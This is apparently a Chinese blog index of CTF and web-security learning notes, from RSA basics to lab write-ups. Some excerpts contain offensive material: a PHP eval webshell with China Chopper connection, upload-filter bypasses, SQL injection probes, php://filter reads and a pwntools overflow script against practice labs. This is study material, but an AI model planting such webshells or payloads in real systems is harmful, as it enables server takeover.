- 博客(36)
- 资源 (8)
- 收藏
- 关注
RSS订阅
原创 RSA公钥密码体制的简介及例题
目录标题传统密码体制传统的对称密码体制密钥管理密钥分发不支持“开放系统”公钥密码体制主要思想:公钥密码体制的优势:密钥分发:密钥管理:开放系统:传统密码体制传统的对称密码体制• 对称密码体制(例如DES, AES) 允许两个用户利用提前共享的 秘密来建立“安全信道”• 通信双方共享秘密并不容易…密钥管理• 考虑一个具有N个用户的团体,如果用户两两之间都需要进行 安全通信:• 采用对称...
2020-04-12 19:28:45
4629
原创 解决无法登录微软(Microsoft)账号的设置
解决无法登录微软账号通过手动设置dns可以快速解决,dns设置为4.2.2.2我以连接WiFi时怎么设置为例1.找到WiFi的标志,右键打开“网络和Internet设置”2.高级网络设置中的“更改适配器选项”3.找到连接的WiFi,这时双击打开再点击属性,或者直接右键打开属性。4.在属性中找到ipv45.打开之后设置dns为4.2.2.2...
2021-04-14 09:28:44
15614
3
原创 修复VMware网络连接失败及设置固定IP
最近被这个网络折磨疯了,记录一下怎么修复虚拟机网路连接VM软件安装好后,就有10个网络连接类型可供选择。分别是:VMnet0、VMnet1、VMnet2、VMnet3、VMnet4、VMnet5、VMnet6、VMnet7、VMnet8、VMnet9。VM虚拟机常用的三种网络连接方式默认:桥接(bridge)用的是VMnet0,NAT用的是VMnet8,host-only用的是VMnet1。网络修复与设置静态IP模式简介桥接模式NAT模式仅主机模式不能上网的解决方法NAT模式不能上网桥接模式不能上网设
2021-04-03 21:31:45
1511
原创 乌云邀请码
乌云邀请码(100)图片隐写下载开图片没有放入Stegsolve查看发现红绿蓝plane0 的最上边都有一排小黑点儿,很可疑选择Analyse 的Data Extract进行分析勾选红绿蓝的0层,选择BGR模式,然后点击Preview,滚动条滑到最上发现flag点击save Bin 保存为.txt格式,打开,复制提交flag{Png_Lsb_Y0u_K0nw!}...
2019-11-16 14:15:12
698
原创 猫片(安恒)
猫片(安恒)(100)图片隐写hint:LSB BGR NTFS1打开题目得到一个名为png的文件Winhex查看是PNG格式,于是后缀名改为.png,题目提示:hint:LSB BGR NTFS用Stegsolve分析了一下,发现当RBG(三原色:红蓝绿)分别处于0的时候,图像会很不正常于是猜想是RGB隐写,又因为提示为BGR,于是用Stegsolve的分析模块查看:...
2019-11-16 13:58:54
292
1
原创 Linux2
Linux2(100)linux系统的使用1看到题目提示,当然还是下载文件后,在kali里解压输入strings brave 命令2文件超级多,靠自己的眼睛,有点反应不过来了幸好kali的终端支持查找终于找到flag...
2019-11-16 13:12:33
393
原创 linux
linux(80)linux系统的使用1既然题目说让用linux,那就用linux吧下载文件,用linux解压2flag肯定就在test文件夹中的flag文件里了。用strings命令查看一下这个文件3找到flag...
2019-11-16 12:42:31
116
原创 多种方法解决
多种方法解决(60)16位编辑器的使用base64编码1解压下载下来的文件,得到一个exe文件,不能直接打开,用winhex打开2根据题目提示还有右侧字母特点想到这个是imgbase64,百度找图片在线转换Base64扫描二维码得到flag...
2019-11-16 12:27:04
190
原创 又一张图片,还单纯吗
又一张图片,还单纯吗(60)kali虚拟机的使用1用binwalk工具查看到这个jpg图片中是否嵌入了其他文件或代码2使用foremost 2.png进行分离找到flagfalg{NSCTF_ e6532a34928a3d1dadd0b049d5a3cc57}...
2019-11-16 12:15:04
328
原创 隐写
隐写(50)图片隐写十六进制编辑器的使用1下载后打开压缩包发现是一张图片用2winhex打开图中红色框内是PNG的PE头 在IHDR后面的八个字节(黄色框部分)为该图片的长度、宽度信息将黄色框内最后一个字节由A4改为F4后另存为图片,出现flag:BUGKU{a1e5aSA}...
2019-11-16 11:28:29
359
原创 web5
web5(50分)知识点:jjencode 和 aaencodejjencode将JS代码转换成只有符号的字符串aaencode将JS代码转换成常用的网络表情方法1.可以直接利用浏览器的控制台输入密文,执行后即可解密。查看网页源码,点击如下图所示位置,查看详细;复制出那一长串代码,在控制台粘贴刚才的代码,得到flag。2.注意题目:字母大写刚才的flag是ctf{whatf...
2019-11-11 19:56:14
315
原创 cookie、session和JWT
cookie和sessionResquest, response不行,因为它们是一个请求对应的一个生命周期。confg和组件servlet是一对一的关系,而登录和查询是不同的servlet所以数据不共用,而且confg没有读取变量的能力。tomcat内只有一个对象,context跟servlet是一对多的关系,而每个人登录传递的账号都是code=" zhangsan"的数据,其中key值都是...
2019-11-11 19:56:03
85
原创 md5 collision(NUPT_CTF)
md5 collision(NUPT_CTF)(100)md5碰撞访问题目链接,得到提示input a,而题目是md5 collision,md5碰撞。根据==用法,0 == 字符串是成立的,从而可以绕过MD5检查。所以找一个md5是oe开头的值,get方式传参过去,?a=s878926199a得到flag:flag{md5_collision_is_easy}其他几个0e开头的m...
2019-11-11 19:54:46
406
原创 cookie欺骗
cookie欺骗(100)写脚本能力和代码审计1.打开页面一长串的字母,无用;源码,无用;观察urlhttp://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到keys.txtphp解析的时候 line 表示的...
2019-11-09 15:05:31
323
原创 备份是个好习惯
备份是个好习惯(80)MD5加密、.bak文件、 strstr()、substr()、str_replace()、parse_str()函数用法打开页面一串字符串“d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e”注意到这是d41d8cd98f00b204e9800998ecf8427e重复了两遍,这是md...
2019-11-09 12:43:09
290
原创 web4
web4(80)escape解码escape采用ISO Latin字符集对指定的字符串进行编码。所有的空格符、标点符号、特殊字符以及其他非ASCII字符都将被转化成%xx格式的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。根据题目提示,查看题目源码注意到图中的红框所示部分,在源码里面我们会发现有两段奇奇怪怪的字符,还有这个函数:eval(unescape(p1) +...
2019-11-09 11:52:13
577
1
转载 反序列化
此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下:class SoFun{ protected $file='index.php'; function __destruct(){ if(!empty($this->file)) { if(strchr($th...
2019-10-27 22:42:35
1945
原创 filter漏洞
php://filter是一种元封装器,设计用于数据流打开时的筛选过滤应用。类似于readfile()、file()和file get contenst(),在数据流内容读取之前没有机会应用其他过滤器。php://filter目标使用一下的参数作为他路径的一部分。复合过滤器能够在一个路径上指定。详细使用这些参数可以参考具体范例。?file=php://filter/convert.base64...
2019-10-20 12:49:55
631
原创 文件上传upload-labs第十一至十九关
白名单,%00截断(需要两个条件:php版本小于5.3.4;php的magic_quotes_gpc为OFF状态)另save_path等于下面的值:…/upload/4.php%00BP修改一下抓到的包
2019-10-14 18:43:37
3016
原创 文件上传upload-labs第五至十关
第五关 黑名单绕过1.还是黑名单,且加上了.htaccess,但是没有将后缀进行大小写统一,于是大小写绕过比如上传.Php后缀文件00x06 黑名单,空绕过1.还是黑名单,但是没有对后缀名进行去空处理,可在后缀名中加空绕过00x07 黑名单,点绕过1.还是黑名单,但是没有对后缀名进行去“.”处理,因此可在后缀名中加“.”绕过(php代码中少了filename=deldot(file_n...
2019-10-13 21:42:30
2413
原创 文件上传upload-labs第四关
作为一个小白,还是直接看提示吧…过滤了很多后缀文件,但是没有过滤.htaccess文件,可以重写文件解析规则绕过,上传一个.htaccess
2019-10-13 21:33:59
3670
原创 文件上传upload-labs第三关
第三关采用了黑名单的验证方式,黑名单过滤也是一种不安全的方式,黑名单中定义了一系列的不安全的扩展名,服务器在接收到文件后,与黑名单做对比,从而决定是否要过滤上传的文件。不过phtml,php3,php4,php5,pht没有禁止,在apache配置文件中当php解析,尝试通过后缀名绕过...
2019-10-11 17:44:57
6773
原创 sqli-labs-master sql注入
用户在User ID的文本框中输入ID,点击提交,网页就会以GET方式把用户刚刚的输入提交到后台,并且进行数据库查询,查询结果又会返回在前端页面下。漏洞判断1.判断网页链接的格式是否符合我们一开始提出的SQL注入产生的条件。2.使用常见的 and 1=1 或者 单引号’ 来判断用户的输入是否被SQL解释器执行。-比如:1’ and 1=1 #,同样的,我们带入到网页的源码中,$getid...
2019-10-09 21:18:49
182
原创 upload-labs第一关
level1根据提示这是本地js文件上传绕过将一句话木马的后缀改成可以上传的文件类型,利用burp suit抓包再改包绕过js改包过程上传成功获取上传的图片地址,在网页上打开,得到一个url打开中国菜刀进行连接...
2019-09-27 17:16:39
1256
原创 创建链表
数据结构之创建链表数据结构中经常用到结构体struct,它用起来比较麻烦,这是会用到typedef来起别名C语言给结构体定义别名用typedef关键字操作,就两种情况:给结构体起一个别名,如:typedef struct ABC{…}S;——这就为结构体ABC定义了一个别名S。以后写S x;就等价于写struct ABC x;了。给结构体指针起一个别名,如:typedef stru...
2019-09-11 19:18:54
216
1
原创 bugkuCTFweb字符?正则?
这道题打开后是一个网页找到其中的正则表达式:/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/解题先来基本的知识储备按照学长的方法,将正则表达式进行拆分key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]key就是普通的字符.是除了换行的任意字符,假设就是a *匹配0或多个正则...
2019-07-29 20:04:13
1441
1
原创 python第一周,北理-python语言程序设计
字符串字符串有两种索引:①正向递增序号:0 1 2 3 4 5 6 7 8 9 10 从零开始请输入带有符号的温度值②反向递减序号:-11-10-9-8-7-6-5-4-3-2-1 从-1开始索引:返回字符串中单个字符<字符串>[-1]取倒数第一个字符切片:返回字符串中的一段字符串<字符串>[1:3]取第一个,第二个,不取第三个 [0...
2019-07-26 21:03:00
170
原创 sqli-labs-master第一关sql注入
先了解一下数据库先登录账户,输入密码之后可以看到N个数据库打开数据库可以看到N个表每个表里还有N个字段除了用sql语句查看,当然也可以用MySQL等直接查看开始步入正题sql注入url处先尝试着输入?id=1;再尝试?id=2;...
2019-07-25 20:53:49
1244
原创 xctf攻防世界pwn level0
答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本from pwn import *p= remote(‘111.198.29.45’,33907)elf=ELF(’./level0’)sysaddr=elf.symbols[‘callsystem’]payload=‘a’*(0x80+8)?+p64(sysaddr)p.recv()p.send(payload)p...
2019-07-24 15:40:48
1469
原创 xctf攻防世界pwn level0的断点调试
将level0文件拖入Ubuntu桌面打开终端:输入cd DESKtop/gdb level0开始运行start得到如图所示断点调试切换到Windows系统,用ida64打开level0找到main函数的地址,复制在Ubuntu终端下执行命令:b *0x+刚复制的地址执行结果如图:按r运行至断点处其他命令...
2019-07-24 15:17:10
809
原创 DVWA文件上传漏洞medium
之前的操作如上一篇https://blog.csdn.net/qq_43480081/article/details/96591612到文件上传时,发现了问题我们来进行抓包进行修改,查得如下:.html text/html.txt text/plain.gif image/gif.jpg image/jpeg...
2019-07-20 15:24:40
699
原创 DVWA文件上传漏洞low
第一关:注意上图中的红色字体路径…/表示上一级,这里有两个…/在网址处找到对应的上两级将hackable/uploads/1.php这个路径替换一下得到如下网页打开中国菜刀进行连接附件,一句话木马:<?php@eval($_POST['aaa']);?>...
2019-07-20 15:02:58
805
原创 bugku杂项之普通的二维码
题目给了一个zip压缩包,解压后发现是一个二维码想着二维码可能会有些提示,用手机扫码后得到如下信息一看这就不是什么正儿八经的flag果断转换思路用HxD打开这个图片,查看十六进制开头如下:没有什么发现再看看结尾:想到了十六进制数转换十进制数经过初次尝试,128位的十六进制数直接转换肯定有问题常规思路按每两位数字截一下,再去转换,发现转换成的十进制数还是太小,十进制数对应的ASC...
2019-07-19 22:58:53
1263
原创 drops第二天 Web安全
Web在ctf比赛中占有很大一部分内容,它与现实的真实的网站漏洞有着密切的联系。Web题目的分类重要的几种Web方法攻防世界:robots,cooki.xff-referJs类:南邮ctf AAencode备份文件类:攻防世界backupphp代码审计sql注入xss...
2019-07-19 21:59:36
280
原创 drops第一天 工具安装
今天新接触了许多软件,还有功能强大的虚拟机。虚拟机安装了全新的Linux系统1.nmapnmap可以实现:主机发现,端口扫描,版本侦测,操作系统侦测等功能2.sqlmap用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。3.Burpsuite用于攻击web应用程序的集成平台,包含了许多工具利用火狐浏览器的FoxyProxy插件,进行4.hydra5.中国菜刀...
2019-07-19 17:01:55
285
2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人